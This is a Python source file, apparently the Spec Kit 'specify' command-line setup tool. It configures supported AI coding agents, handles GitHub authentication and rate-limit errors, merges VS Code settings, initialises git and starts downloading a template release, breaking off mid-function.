from typing import Any, Optional, Tuple
import typer
import httpx
from rich.console import Console
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, TextColumn
from rich.text import Text
from rich.live import Live
from rich.align import Align
from rich.table import Table
from rich.tree import Tree
from typer.core import TyperGroup
# For cross-platform keyboard input
import readchar
import ssl
import truststore
from datetime import datetime, timezone
# Verify TLS against the operating system's trust store (rather than a bundled
# CA file) so corporate proxies and custom CAs work without extra configuration.
ssl_context = truststore.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# Shared HTTP client reused for all network requests in this module.
client = httpx.Client(verify=ssl_context)
def _github_token(cli_token: str | None = None) -> str | None:
return ((cli_token or os.getenv("GH_TOKEN") or os.getenv("GITHUB_TOKEN") or "").strip()) or None
def _github_auth_headers(cli_token: str | None = None) -> dict:
    """Build an Authorization header dict, or an empty dict when no token is available."""
    token = _github_token(cli_token)
    if not token:
        return {}
    return {"Authorization": f"Bearer {token}"}
def _parse_rate_limit_headers(headers: "httpx.Headers") -> dict:
    """Extract GitHub rate-limit details from HTTP response headers.

    Args:
        headers: Response headers (any mapping supporting ``in`` and ``.get``).

    Returns:
        Dict possibly containing: ``limit``, ``remaining`` (raw strings),
        ``reset_epoch`` (int), ``reset_time`` (aware UTC datetime),
        ``reset_local`` (same instant in local time), and either
        ``retry_after_seconds`` (int) or ``retry_after`` (raw string when
        Retry-After is an HTTP-date rather than a number).
    """
    info = {}
    # Standard GitHub rate-limit headers
    if "X-RateLimit-Limit" in headers:
        info["limit"] = headers.get("X-RateLimit-Limit")
    if "X-RateLimit-Remaining" in headers:
        info["remaining"] = headers.get("X-RateLimit-Remaining")
    if "X-RateLimit-Reset" in headers:
        # These headers come from a remote server: a malformed epoch should
        # degrade to "no reset info" rather than crash error reporting.
        try:
            reset_epoch = int(headers.get("X-RateLimit-Reset", "0"))
        except ValueError:
            reset_epoch = 0
        if reset_epoch:
            reset_time = datetime.fromtimestamp(reset_epoch, tz=timezone.utc)
            info["reset_epoch"] = reset_epoch
            info["reset_time"] = reset_time
            info["reset_local"] = reset_time.astimezone()
    # Retry-After header (seconds or HTTP-date)
    if "Retry-After" in headers:
        retry_after = headers.get("Retry-After")
        try:
            info["retry_after_seconds"] = int(retry_after)
        except ValueError:
            # HTTP-date format - not implemented, just store as string
            info["retry_after"] = retry_after
    return info
def _format_rate_limit_error(status_code: int, headers: httpx.Headers, url: str) -> str:
    """Build a rich-markup error message for a failed GitHub API request.

    Includes whatever rate-limit details the response headers carry
    (limit, remaining, reset time, retry-after), followed by fixed
    troubleshooting guidance about authenticating to raise the limit.

    Args:
        status_code: HTTP status code returned by GitHub.
        headers: Response headers, parsed via _parse_rate_limit_headers.
        url: The URL that was requested (included in the message).

    Returns:
        A multi-line string using rich markup (e.g. [bold]...[/bold]).
    """
    rate_info = _parse_rate_limit_headers(headers)
    lines = [f"GitHub API returned status {status_code} for {url}"]
    lines.append("")
    # Only emit the rate-limit section when the server sent any such headers.
    if rate_info:
        lines.append("[bold]Rate Limit Information:[/bold]")
        if "limit" in rate_info:
            lines.append(f"  • Rate Limit: {rate_info['limit']} requests/hour")
        if "remaining" in rate_info:
            lines.append(f"  • Remaining: {rate_info['remaining']}")
        if "reset_local" in rate_info:
            reset_str = rate_info["reset_local"].strftime("%Y-%m-%d %H:%M:%S %Z")
            lines.append(f"  • Resets at: {reset_str}")
        if "retry_after_seconds" in rate_info:
            lines.append(f"  • Retry after: {rate_info['retry_after_seconds']} seconds")
        lines.append("")
    # Add troubleshooting guidance
    lines.append("[bold]Troubleshooting Tips:[/bold]")
    lines.append("  • If you're on a shared CI or corporate environment, you may be rate-limited.")
    lines.append("  • Consider using a GitHub token via --github-token or the GH_TOKEN/GITHUB_TOKEN")
    lines.append("    environment variable to increase rate limits.")
    lines.append("  • Authenticated requests have a limit of 5,000/hour vs 60/hour for unauthenticated.")
    return "\n".join(lines)
# Agent configuration with name, folder, install URL, CLI tool requirement, and commands subdirectory
# Schema per agent key (the key itself is the value accepted by --ai):
#   name            - human-readable agent name shown in UI/messages
#   folder          - project-relative directory the agent reads its assets from
#                     (None for "generic", which is supplied via --ai-commands-dir)
#   commands_subdir - subdirectory under `folder` for command files; several
#                     agents deviate from the common "commands" layout
#   install_url     - where to obtain the agent's CLI (None for IDE-based agents)
#   requires_cli    - whether a CLI executable is expected to be installed
AGENT_CONFIG = {
    "copilot": {
        "name": "GitHub Copilot",
        "folder": ".github/",
        "commands_subdir": "agents",  # Special: uses agents/ not commands/
        "install_url": None,  # IDE-based, no CLI check needed
        "requires_cli": False,
    },
    "claude": {
        "name": "Claude Code",
        "folder": ".claude/",
        "commands_subdir": "commands",
        "install_url": "https://docs.anthropic.com/en/docs/claude-code/setup",
        "requires_cli": True,
    },
    "gemini": {
        "name": "Gemini CLI",
        "folder": ".gemini/",
        "commands_subdir": "commands",
        "install_url": "https://github.com/google-gemini/gemini-cli",
        "requires_cli": True,
    },
    "cursor-agent": {
        "name": "Cursor",
        "folder": ".cursor/",
        "commands_subdir": "commands",
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "qwen": {
        "name": "Qwen Code",
        "folder": ".qwen/",
        "commands_subdir": "commands",
        "install_url": "https://github.com/QwenLM/qwen-code",
        "requires_cli": True,
    },
    "opencode": {
        "name": "opencode",
        "folder": ".opencode/",
        "commands_subdir": "command",  # Special: singular 'command' not 'commands'
        "install_url": "https://opencode.ai",
        "requires_cli": True,
    },
    "codex": {
        "name": "Codex CLI",
        "folder": ".codex/",
        "commands_subdir": "prompts",  # Special: uses prompts/ not commands/
        "install_url": "https://github.com/openai/codex",
        "requires_cli": True,
    },
    "windsurf": {
        "name": "Windsurf",
        "folder": ".windsurf/",
        "commands_subdir": "workflows",  # Special: uses workflows/ not commands/
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "kilocode": {
        "name": "Kilo Code",
        "folder": ".kilocode/",
        "commands_subdir": "workflows",  # Special: uses workflows/ not commands/
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "auggie": {
        "name": "Auggie CLI",
        "folder": ".augment/",
        "commands_subdir": "commands",
        "install_url": "https://docs.augmentcode.com/cli/setup-auggie/install-auggie-cli",
        "requires_cli": True,
    },
    "codebuddy": {
        "name": "CodeBuddy",
        "folder": ".codebuddy/",
        "commands_subdir": "commands",
        "install_url": "https://www.codebuddy.ai/cli",
        "requires_cli": True,
    },
    "qodercli": {
        "name": "Qoder CLI",
        "folder": ".qoder/",
        "commands_subdir": "commands",
        "install_url": "https://qoder.com/cli",
        "requires_cli": True,
    },
    "roo": {
        "name": "Roo Code",
        "folder": ".roo/",
        "commands_subdir": "commands",
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "kiro-cli": {
        "name": "Kiro CLI",
        "folder": ".kiro/",
        "commands_subdir": "prompts",  # Special: uses prompts/ not commands/
        "install_url": "https://kiro.dev/docs/cli/",
        "requires_cli": True,
    },
    "amp": {
        "name": "Amp",
        "folder": ".agents/",
        "commands_subdir": "commands",
        "install_url": "https://ampcode.com/manual#install",
        "requires_cli": True,
    },
    "shai": {
        "name": "SHAI",
        "folder": ".shai/",
        "commands_subdir": "commands",
        "install_url": "https://github.com/ovh/shai",
        "requires_cli": True,
    },
    "tabnine": {
        "name": "Tabnine CLI",
        "folder": ".tabnine/agent/",
        "commands_subdir": "commands",
        "install_url": "https://docs.tabnine.com/main/getting-started/tabnine-cli",
        "requires_cli": True,
    },
    "agy": {
        "name": "Antigravity",
        "folder": ".agent/",
        "commands_subdir": "commands",
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "bob": {
        "name": "IBM Bob",
        "folder": ".bob/",
        "commands_subdir": "commands",
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "vibe": {
        "name": "Mistral Vibe",
        "folder": ".vibe/",
        "commands_subdir": "prompts",
        "install_url": "https://github.com/mistralai/mistral-vibe",
        "requires_cli": True,
    },
    "kimi": {
        "name": "Kimi Code",
        "folder": ".kimi/",
        "commands_subdir": "skills",  # Kimi uses /skill:<name> with .kimi/skills/<name>/SKILL.md
        "install_url": "https://code.kimi.com/",
        "requires_cli": True,
    },
    "trae": {
        "name": "Trae",
        "folder": ".trae/",
        "commands_subdir": "rules",  # Trae uses .trae/rules/ for project rules
        "install_url": None,  # IDE-based
        "requires_cli": False,
    },
    "pi": {
        "name": "Pi Coding Agent",
        "folder": ".pi/",
        "commands_subdir": "prompts",
        "install_url": "https://www.npmjs.com/package/@mariozechner/pi-coding-agent",
        "requires_cli": True,
    },
    "generic": {
        "name": "Generic (bring your own agent)",
        "folder": None,  # Set dynamically via --ai-commands-dir
        "commands_subdir": "commands",
        "install_url": None,
        "requires_cli": False,
    },
}

# Accepted alternate spellings for --ai values, mapped to their canonical keys.
AI_ASSISTANT_ALIASES = {
    "kiro": "kiro-cli",
}
def _build_ai_assistant_help() -> str:
    """Compose the help text for the --ai option.

    Lists every configured agent except "generic" (which is mentioned
    separately since it requires --ai-commands-dir), then appends a
    sentence describing any accepted aliases.
    """
    agents = sorted(key for key in AGENT_CONFIG if key != "generic")
    base_help = (
        f"AI assistant to use: {', '.join(agents)}, "
        "or generic (requires --ai-commands-dir)."
    )
    if not AI_ASSISTANT_ALIASES:
        return base_help
    phrases = [
        f"'{alias}' as an alias for '{target}'"
        for alias, target in sorted(AI_ASSISTANT_ALIASES.items())
    ]
    if len(phrases) == 1:
        aliases_text = phrases[0]
    else:
        # Oxford-free list: "a, b and c"
        aliases_text = ', '.join(phrases[:-1]) + ' and ' + phrases[-1]
    return base_help + " Use " + aliases_text + "."
# Help text for the --ai option, derived from AGENT_CONFIG and its aliases.
AI_ASSISTANT_HELP = _build_ai_assistant_help()
# Supported flavors for generated helper scripts.
SCRIPT_TYPE_CHOICES = {"sh": "POSIX Shell (bash/zsh)", "ps": "PowerShell"}
# `claude migrate-installer` relocates the CLI here and removes it from PATH,
# so this location is checked explicitly (see check_tool below).
CLAUDE_LOCAL_PATH = Path.home() / ".claude" / "local" / "claude"
# ASCII-art banner rendered by show_banner() with a per-line color gradient.
BANNER = """
███████╗██████╗ ███████╗ ██████╗██╗███████╗██╗ ██╗
██╔════╝██╔══██╗██╔════╝██╔════╝██║██╔════╝╚██╗ ██╔╝
███████╗██████╔╝█████╗ ██║ ██║█████╗ ╚████╔╝
╚════██║██╔═══╝ ██╔══╝ ██║ ██║██╔══╝ ╚██╔╝
███████║██║ ███████╗╚██████╗██║██║ ██║
╚══════╝╚═╝ ╚══════╝ ╚═════╝╚═╝╚═╝ ╚═╝
"""
# Tagline printed beneath the banner.
TAGLINE = "GitHub Spec Kit - Spec-Driven Development Toolkit"
class StepTracker:
    """Track a titled list of steps and render them as a rich Tree.

    Each step is a dict of {key, label, status, detail} where status is one
    of pending/running/done/error/skipped. An optional refresh callback is
    invoked after every mutation so a live UI can re-render itself.
    """

    def __init__(self, title: str):
        self.title = title
        self.steps = []  # list of dicts: {key, label, status, detail}
        self.status_order = {"pending": 0, "running": 1, "done": 2, "error": 3, "skipped": 4}
        self._refresh_cb = None  # zero-arg callable used to trigger a UI refresh

    def attach_refresh(self, cb):
        """Register a callable fired after every step mutation."""
        self._refresh_cb = cb

    def add(self, key: str, label: str):
        """Register a new pending step; a duplicate key is silently ignored."""
        if any(step["key"] == key for step in self.steps):
            return
        self.steps.append({"key": key, "label": label, "status": "pending", "detail": ""})
        self._maybe_refresh()

    def start(self, key: str, detail: str = ""):
        """Mark a step as running."""
        self._update(key, status="running", detail=detail)

    def complete(self, key: str, detail: str = ""):
        """Mark a step as done."""
        self._update(key, status="done", detail=detail)

    def error(self, key: str, detail: str = ""):
        """Mark a step as failed."""
        self._update(key, status="error", detail=detail)

    def skip(self, key: str, detail: str = ""):
        """Mark a step as skipped."""
        self._update(key, status="skipped", detail=detail)

    def _update(self, key: str, status: str, detail: str):
        """Set status/detail on an existing step, or append an ad-hoc one."""
        entry = next((step for step in self.steps if step["key"] == key), None)
        if entry is None:
            # Unknown key: create the step on the fly, using the key as its label.
            self.steps.append({"key": key, "label": key, "status": status, "detail": detail})
        else:
            entry["status"] = status
            if detail:  # an empty detail keeps whatever detail was set before
                entry["detail"] = detail
        self._maybe_refresh()

    def _maybe_refresh(self):
        """Invoke the refresh callback if attached, swallowing any errors."""
        if not self._refresh_cb:
            return
        try:
            self._refresh_cb()
        except Exception:
            pass

    def render(self):
        """Build a rich Tree of all steps with colored status symbols."""
        symbols = {
            "done": "[green]●[/green]",
            "pending": "[green dim]○[/green dim]",
            "running": "[cyan]○[/cyan]",
            "error": "[red]●[/red]",
            "skipped": "[yellow]○[/yellow]",
        }
        tree = Tree(f"[cyan]{self.title}[/cyan]", guide_style="grey50")
        for step in self.steps:
            symbol = symbols.get(step["status"], " ")
            detail_text = step["detail"].strip() if step["detail"] else ""
            if step["status"] == "pending":
                # Entire line light gray while waiting.
                body = f"{step['label']} ({detail_text})" if detail_text else step["label"]
                tree.add(f"{symbol} [bright_black]{body}[/bright_black]")
            else:
                # Label white, detail (if any) light gray in parentheses.
                line = f"{symbol} [white]{step['label']}[/white]"
                if detail_text:
                    line += f" [bright_black]({detail_text})[/bright_black]"
                tree.add(line)
        return tree
def get_key():
    """Read a single keypress and normalize navigation keys.

    Returns 'up', 'down', 'enter', or 'escape' for the corresponding keys
    (Ctrl+P / Ctrl+N act as up / down); raises KeyboardInterrupt on Ctrl+C;
    any other key is returned unchanged.
    """
    pressed = readchar.readkey()
    if pressed in (readchar.key.UP, readchar.key.CTRL_P):
        return 'up'
    if pressed in (readchar.key.DOWN, readchar.key.CTRL_N):
        return 'down'
    if pressed == readchar.key.ENTER:
        return 'enter'
    if pressed == readchar.key.ESC:
        return 'escape'
    if pressed == readchar.key.CTRL_C:
        raise KeyboardInterrupt
    return pressed
def select_with_arrows(options: dict, prompt_text: str = "Select an option", default_key: str = None) -> str:
    """Interactively pick one key from `options` using the arrow keys.

    Renders a live-updating panel of options; ↑/↓ move the highlight,
    Enter confirms, Esc or Ctrl+C cancels and exits the CLI.

    Args:
        options: Mapping of option key -> human-readable description.
        prompt_text: Title displayed on the selection panel.
        default_key: Key to pre-highlight; falls back to the first option.

    Returns:
        The selected option key.

    Raises:
        typer.Exit: With code 1 when the user cancels or selection fails.
    """
    option_keys = list(options.keys())
    if default_key and default_key in option_keys:
        selected_index = option_keys.index(default_key)
    else:
        selected_index = 0

    selected_key = None

    def create_selection_panel():
        # Rebuilt on every keypress so the ▶ marker follows selected_index.
        table = Table.grid(padding=(0, 2))
        table.add_column(style="cyan", justify="left", width=3)
        table.add_column(style="white", justify="left")

        for i, key in enumerate(option_keys):
            if i == selected_index:
                table.add_row("▶", f"[cyan]{key}[/cyan] [dim]({options[key]})[/dim]")
            else:
                table.add_row(" ", f"[cyan]{key}[/cyan] [dim]({options[key]})[/dim]")

        table.add_row("", "")
        table.add_row("", "[dim]Use ↑/↓ to navigate, Enter to select, Esc to cancel[/dim]")

        return Panel(
            table,
            title=f"[bold]{prompt_text}[/bold]",
            border_style="cyan",
            padding=(1, 2)
        )

    console.print()

    def run_selection_loop():
        nonlocal selected_key, selected_index
        # transient=True clears the panel once the selection is made.
        with Live(create_selection_panel(), console=console, transient=True, auto_refresh=False) as live:
            while True:
                try:
                    key = get_key()
                    if key == 'up':
                        # Modulo arithmetic wraps the highlight at both ends.
                        selected_index = (selected_index - 1) % len(option_keys)
                    elif key == 'down':
                        selected_index = (selected_index + 1) % len(option_keys)
                    elif key == 'enter':
                        selected_key = option_keys[selected_index]
                        break
                    elif key == 'escape':
                        console.print("\n[yellow]Selection cancelled[/yellow]")
                        raise typer.Exit(1)

                    live.update(create_selection_panel(), refresh=True)

                except KeyboardInterrupt:
                    console.print("\n[yellow]Selection cancelled[/yellow]")
                    raise typer.Exit(1)

    run_selection_loop()

    if selected_key is None:
        # Defensive: the loop should only exit with a selection or via Exit.
        console.print("\n[red]Selection failed.[/red]")
        raise typer.Exit(1)

    return selected_key
# Shared Rich console used for all terminal output in this module.
console = Console()
class BannerGroup(TyperGroup):
    """Typer command group that prints the ASCII banner before help output."""

    def format_help(self, ctx, formatter):
        # Show banner before help
        show_banner()
        super().format_help(ctx, formatter)
# Root CLI application. invoke_without_command=True lets a bare `specify`
# invocation reach the callback below; cls=BannerGroup adds the banner to help.
app = typer.Typer(
    name="specify",
    help="Setup tool for Specify spec-driven development projects",
    add_completion=False,
    invoke_without_command=True,
    cls=BannerGroup,
)
def show_banner():
    """Print the centered ASCII-art banner plus tagline to the console.

    Edge case: if the banner has more lines than the color palette, colors
    repeat cyclically via the modulo index.
    """
    banner_lines = BANNER.strip().split('\n')
    colors = ["bright_blue", "blue", "cyan", "bright_cyan", "white", "bright_white"]
    styled_banner = Text()
    for i, line in enumerate(banner_lines):
        color = colors[i % len(colors)]
        styled_banner.append(line + "\n", style=color)
    console.print(Align.center(styled_banner))
    console.print(Align.center(Text(TAGLINE, style="italic bright_yellow")))
    console.print()
@app.callback()
def callback(ctx: typer.Context):
    """Handle a bare `specify` invocation (no subcommand).

    Edge case: the banner is suppressed when --help/-h appears anywhere in
    sys.argv because BannerGroup.format_help already prints it, and showing
    it here too would duplicate it.
    """
    if ctx.invoked_subcommand is None and "--help" not in sys.argv and "-h" not in sys.argv:
        show_banner()
        console.print(Align.center("[dim]Run 'specify --help' for usage information[/dim]"))
        console.print()
def run_command(cmd: list[str], check_return: bool = True, capture: bool = False, shell: bool = False) -> Optional[str]:
    """Run a subprocess, optionally capturing its stdout.

    Args:
        cmd: Command and arguments. With ``shell=True`` a single string may
            be passed instead (standard subprocess semantics).
        check_return: Raise ``CalledProcessError`` on a non-zero exit code.
        capture: Capture and return stripped stdout instead of streaming it.
        shell: Execute through the shell.

    Returns:
        Stripped stdout when ``capture=True`` and the command succeeds,
        otherwise ``None``.

    Edge cases:
        - With ``check_return=False`` a failing command never raises and the
          function quietly returns ``None``.
        - On failure with ``check_return=True``, the command, exit code, and
          any captured stderr are printed before the exception is re-raised.
    """
    try:
        if capture:
            result = subprocess.run(cmd, check=check_return, capture_output=True, text=True, shell=shell)
            return result.stdout.strip()
        else:
            subprocess.run(cmd, check=check_return, shell=shell)
            return None
    except subprocess.CalledProcessError as e:
        if check_return:
            # `cmd` may legitimately be a plain string when shell=True;
            # ' '.join() on a string would interleave spaces between every
            # character, so guard the display form.
            cmd_display = cmd if isinstance(cmd, str) else ' '.join(cmd)
            console.print(f"[red]Error running command:[/red] {cmd_display}")
            console.print(f"[red]Exit code:[/red] {e.returncode}")
            if hasattr(e, 'stderr') and e.stderr:
                console.print(f"[red]Error output:[/red] {e.stderr}")
            raise
        return None
def check_tool(tool: str, tracker: StepTracker | None = None) -> bool:
    """Check whether a CLI tool is available on this machine.

    Args:
        tool: Executable name to look up on PATH.
        tracker: Optional StepTracker; when provided, the result is recorded
            on it ("available" / "not found") in addition to being returned.

    Returns:
        True when the tool (or an accepted alias) is found.

    Edge cases:
        - "claude": after `claude migrate-installer` the binary is removed
          from PATH and replaced by ~/.claude/local/claude, so that path is
          checked first (see linked issue below).
        - "kiro-cli": either `kiro-cli` or the legacy `kiro` executable
          counts as available.
    """
    # Special handling for Claude CLI after `claude migrate-installer`
    # See: https://github.com/github/spec-kit/issues/123
    # The migrate-installer command REMOVES the original executable from PATH
    # and creates an alias at ~/.claude/local/claude instead
    # This path should be prioritized over other claude executables in PATH
    if tool == "claude":
        if CLAUDE_LOCAL_PATH.exists() and CLAUDE_LOCAL_PATH.is_file():
            if tracker:
                tracker.complete(tool, "available")
            return True
    if tool == "kiro-cli":
        # Kiro currently supports both executable names. Prefer kiro-cli and
        # accept kiro as a compatibility fallback.
        found = shutil.which("kiro-cli") is not None or shutil.which("kiro") is not None
    else:
        found = shutil.which(tool) is not None
    if tracker:
        if found:
            tracker.complete(tool, "available")
        else:
            tracker.error(tool, "not found")
    return found
def is_git_repo(path: Path = None) -> bool:
    """Return True when *path* (default: the cwd) is inside a git work tree.

    Edge cases: a missing or non-directory path yields False, as does an
    absent `git` executable (FileNotFoundError) or any non-zero git exit —
    the function never raises for those conditions.
    """
    target = Path.cwd() if path is None else path
    if not target.is_dir():
        return False
    try:
        # Delegate the decision to git itself; this also returns True from
        # any subdirectory of a repository, not just its root.
        subprocess.run(
            ["git", "rev-parse", "--is-inside-work-tree"],
            check=True,
            capture_output=True,
            cwd=target,
        )
    except (subprocess.CalledProcessError, FileNotFoundError):
        return False
    return True
def init_git_repo(project_path: Path, quiet: bool = False) -> Tuple[bool, Optional[str]]:
    """Initialize a git repository in *project_path* with an initial commit.

    Args:
        project_path: Directory to initialize (must exist).
        quiet: Suppress status output on the console.

    Returns:
        Tuple of (success, error_message). error_message is None on success
        and a multi-line description (command, exit code, stderr/stdout) on
        failure.

    Edge cases:
        - The working directory is changed for the git commands and always
          restored in the finally block, even when a command fails.
        - Git output is captured, so quiet mode produces no stray output.
        - stderr is preferred over stdout when composing the error message.
        - A nonexistent *project_path* makes os.chdir raise (not caught
          here); the original cwd is still restored by the finally block.
    """
    try:
        original_cwd = Path.cwd()
        os.chdir(project_path)
        if not quiet:
            console.print("[cyan]Initializing git repository...[/cyan]")
        subprocess.run(["git", "init"], check=True, capture_output=True, text=True)
        subprocess.run(["git", "add", "."], check=True, capture_output=True, text=True)
        subprocess.run(["git", "commit", "-m", "Initial commit from Specify template"], check=True, capture_output=True, text=True)
        if not quiet:
            console.print("[green]✓[/green] Git repository initialized")
        return True, None
    except subprocess.CalledProcessError as e:
        error_msg = f"Command: {' '.join(e.cmd)}\nExit code: {e.returncode}"
        if e.stderr:
            error_msg += f"\nError: {e.stderr.strip()}"
        elif e.stdout:
            error_msg += f"\nOutput: {e.stdout.strip()}"
        if not quiet:
            console.print(f"[red]Error initializing git repository:[/red] {e}")
        return False, error_msg
    finally:
        os.chdir(original_cwd)
def handle_vscode_settings(sub_item, dest_file, rel_path, verbose=False, tracker=None) -> None:
    """Install a template .vscode/settings.json, merging with any existing one.

    Args:
        sub_item: Path to the template settings.json being installed.
        dest_file: Destination settings.json path in the project.
        rel_path: Path relative to the template root (used only for logging).
        verbose: Emit per-file log lines (suppressed when a tracker is used).
        tracker: Optional StepTracker; its presence silences console logging.

    Edge cases:
        - Existing user settings always win over template values (polite
          merge performed by merge_json_files).
        - The template may contain JSONC (comments/trailing commas); json5
          parses it, but a rewritten merged file is normalized to plain JSON.
        - If the merge produced no changes (merge_json_files returns None),
          the existing file is left untouched, preserving its formatting.
        - Any failure falls back to copying the template verbatim, but only
          if no settings file already exists — user data is never clobbered.
    """
    def log(message, color="green"):
        # Console logging is intentionally suppressed when a tracker drives
        # progress display, to avoid interleaving output.
        if verbose and not tracker:
            console.print(f"[{color}]{message}[/] {rel_path}")
    def atomic_write_json(target_file: Path, payload: dict[str, Any]) -> None:
        """Write JSON atomically: temp file in the same dir, then os.replace.

        Edge cases: permissions (and best-effort ownership) of an existing
        target are preserved; the temp file is cleaned up on any failure.
        """
        temp_path: Optional[Path] = None
        try:
            with tempfile.NamedTemporaryFile(
                mode='w',
                encoding='utf-8',
                dir=target_file.parent,
                prefix=f"{target_file.name}.",
                suffix=".tmp",
                delete=False,
            ) as f:
                temp_path = Path(f.name)
                json.dump(payload, f, indent=4)
                f.write('\n')
            if target_file.exists():
                try:
                    existing_stat = target_file.stat()
                    os.chmod(temp_path, stat.S_IMODE(existing_stat.st_mode))
                    if hasattr(os, "chown"):
                        try:
                            os.chown(temp_path, existing_stat.st_uid, existing_stat.st_gid)
                        except PermissionError:
                            # Best-effort owner/group preservation without requiring elevated privileges.
                            pass
                except OSError:
                    # Best-effort metadata preservation; data safety is prioritized.
                    pass
            os.replace(temp_path, target_file)
        except Exception:
            if temp_path and temp_path.exists():
                temp_path.unlink()
            raise
    try:
        with open(sub_item, 'r', encoding='utf-8') as f:
            # json5 natively supports comments and trailing commas (JSONC)
            new_settings = json5.load(f)
        if dest_file.exists():
            merged = merge_json_files(dest_file, new_settings, verbose=verbose and not tracker)
            if merged is not None:
                atomic_write_json(dest_file, merged)
                log("Merged:", "green")
                log("Note: comments/trailing commas are normalized when rewritten", "yellow")
            else:
                log("Skipped merge (preserved existing settings)", "yellow")
        else:
            shutil.copy2(sub_item, dest_file)
            log("Copied (no existing settings.json):", "blue")
    except Exception as e:
        log(f"Warning: Could not merge settings: {e}", "yellow")
        if not dest_file.exists():
            shutil.copy2(sub_item, dest_file)
def merge_json_files(existing_path: Path, new_content: Any, verbose: bool = False) -> Optional[dict[str, Any]]:
    """Politely merge template JSON into an existing JSON file's content.

    "Polite" means existing keys always win: template values are only added
    for keys the user does not already have, recursing into nested dicts.

    Args:
        existing_path: Path to the user's current JSON/JSONC file.
        new_content: Parsed template content to merge in (must be a dict).
        verbose: Print warnings/status to the console.

    Returns:
        The merged dict, or None in every "do not rewrite the file" case:
        - the existing file is present but unparseable or unreadable,
        - the template content is not a dict,
        - the existing parsed content is not a dict (avoid data loss),
        - the merge produced no changes (preserves comments/formatting).
        Edge case: if the file does not exist (or vanished between the
        exists() check and the open — handled via FileNotFoundError), the
        template content is returned unchanged.
    """
    # Load existing content first to have a safe fallback
    existing_content = None
    exists = existing_path.exists()
    if exists:
        try:
            with open(existing_path, 'r', encoding='utf-8') as f:
                # Handle comments (JSONC) natively with json5
                # Note: json5 handles BOM automatically
                existing_content = json5.load(f)
        except FileNotFoundError:
            # Handle race condition where file is deleted after exists() check
            exists = False
        except Exception as e:
            if verbose:
                console.print(f"[yellow]Warning: Could not read or parse existing JSON in {existing_path.name} ({e}).[/yellow]")
            # Skip merge to preserve existing file if unparseable or inaccessible (e.g. PermissionError)
            return None
    # Validate template content
    if not isinstance(new_content, dict):
        if verbose:
            console.print(f"[yellow]Warning: Template content for {existing_path.name} is not a dictionary. Preserving existing settings.[/yellow]")
        return None
    if not exists:
        return new_content
    # If existing content parsed but is not a dict, skip merge to avoid data loss
    if not isinstance(existing_content, dict):
        if verbose:
            console.print(f"[yellow]Warning: Existing JSON in {existing_path.name} is not an object. Skipping merge to avoid data loss.[/yellow]")
        return None
    def deep_merge_polite(base: dict[str, Any], update: dict[str, Any]) -> dict[str, Any]:
        """Return base with update's keys added, never overwriting base values."""
        result = base.copy()
        for key, value in update.items():
            if key not in result:
                # Add new key
                result[key] = value
            elif isinstance(result[key], dict) and isinstance(value, dict):
                # Recursively merge nested dictionaries
                result[key] = deep_merge_polite(result[key], value)
            else:
                # Key already exists and values are not both dicts; preserve existing value.
                # This ensures user settings aren't overwritten by template defaults.
                pass
        return result
    merged = deep_merge_polite(existing_content, new_content)
    # Detect if anything actually changed. If not, return None so the caller
    # can skip rewriting the file (preserving user's comments/formatting).
    if merged == existing_content:
        return None
    if verbose:
        console.print(f"[cyan]Merged JSON file:[/cyan] {existing_path.name}")
    return merged
def download_template_from_github(ai_assistant: str, download_dir: Path, *, script_type: str = "sh", verbose: bool = True, show_progress: bool = True, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Tuple[Path, dict]:
    """Download the latest spec-kit template ZIP for an AI assistant.

    Args:
        ai_assistant: Agent identifier used in the asset name pattern.
        download_dir: Directory where the ZIP is saved.
        script_type: "sh" or "ps" variant of the template.
        verbose: Print human-readable progress to the console.
        show_progress: Render a download progress bar (verbose transfers).
        client: Optional pre-built httpx.Client; a default TLS-verified one
            is created when None.
        debug: Append truncated response bodies to error messages.
        github_token: Token for authenticated API requests (higher rate limit).

    Returns:
        Tuple of (path to downloaded ZIP, metadata dict with filename, size,
        release tag, and asset URL).

    Raises:
        typer.Exit: on fetch errors, missing matching asset, or download
            failure (partial downloads are deleted first).

    Edge cases:
        - Non-200 API/download responses are turned into RuntimeErrors that
          include rate-limit details via _format_rate_limit_error.
        - A missing content-length header (total_size == 0) disables the
          progress bar and streams chunks without progress accounting.
        - Only the first asset matching the name pattern is used.
    """
    repo_owner = "github"
    repo_name = "spec-kit"
    if client is None:
        client = httpx.Client(verify=ssl_context)
    if verbose:
        console.print("[cyan]Fetching latest release information...[/cyan]")
    api_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/releases/latest"
    try:
        response = client.get(
            api_url,
            timeout=30,
            follow_redirects=True,
            headers=_github_auth_headers(github_token),
        )
        status = response.status_code
        if status != 200:
            # Format detailed error message with rate-limit info
            error_msg = _format_rate_limit_error(status, response.headers, api_url)
            if debug:
                error_msg += f"\n\n[dim]Response body (truncated 500):[/dim]\n{response.text[:500]}"
            raise RuntimeError(error_msg)
        try:
            release_data = response.json()
        except ValueError as je:
            raise RuntimeError(f"Failed to parse release JSON: {je}\nRaw (truncated 400): {response.text[:400]}")
    except Exception as e:
        console.print("[red]Error fetching release information[/red]")
        console.print(Panel(str(e), title="Fetch Error", border_style="red"))
        raise typer.Exit(1)
    assets = release_data.get("assets", [])
    pattern = f"spec-kit-template-{ai_assistant}-{script_type}"
    matching_assets = [
        asset for asset in assets
        if pattern in asset["name"] and asset["name"].endswith(".zip")
    ]
    asset = matching_assets[0] if matching_assets else None
    if asset is None:
        console.print(f"[red]No matching release asset found[/red] for [bold]{ai_assistant}[/bold] (expected pattern: [bold]{pattern}[/bold])")
        asset_names = [a.get('name', '?') for a in assets]
        console.print(Panel("\n".join(asset_names) or "(no assets)", title="Available Assets", border_style="yellow"))
        raise typer.Exit(1)
    download_url = asset["browser_download_url"]
    filename = asset["name"]
    file_size = asset["size"]
    if verbose:
        # Fix: previously printed a literal "(unknown)" placeholder instead
        # of the resolved asset name.
        console.print(f"[cyan]Found template:[/cyan] {filename}")
        console.print(f"[cyan]Size:[/cyan] {file_size:,} bytes")
        console.print(f"[cyan]Release:[/cyan] {release_data['tag_name']}")
    zip_path = download_dir / filename
    if verbose:
        console.print("[cyan]Downloading template...[/cyan]")
    try:
        with client.stream(
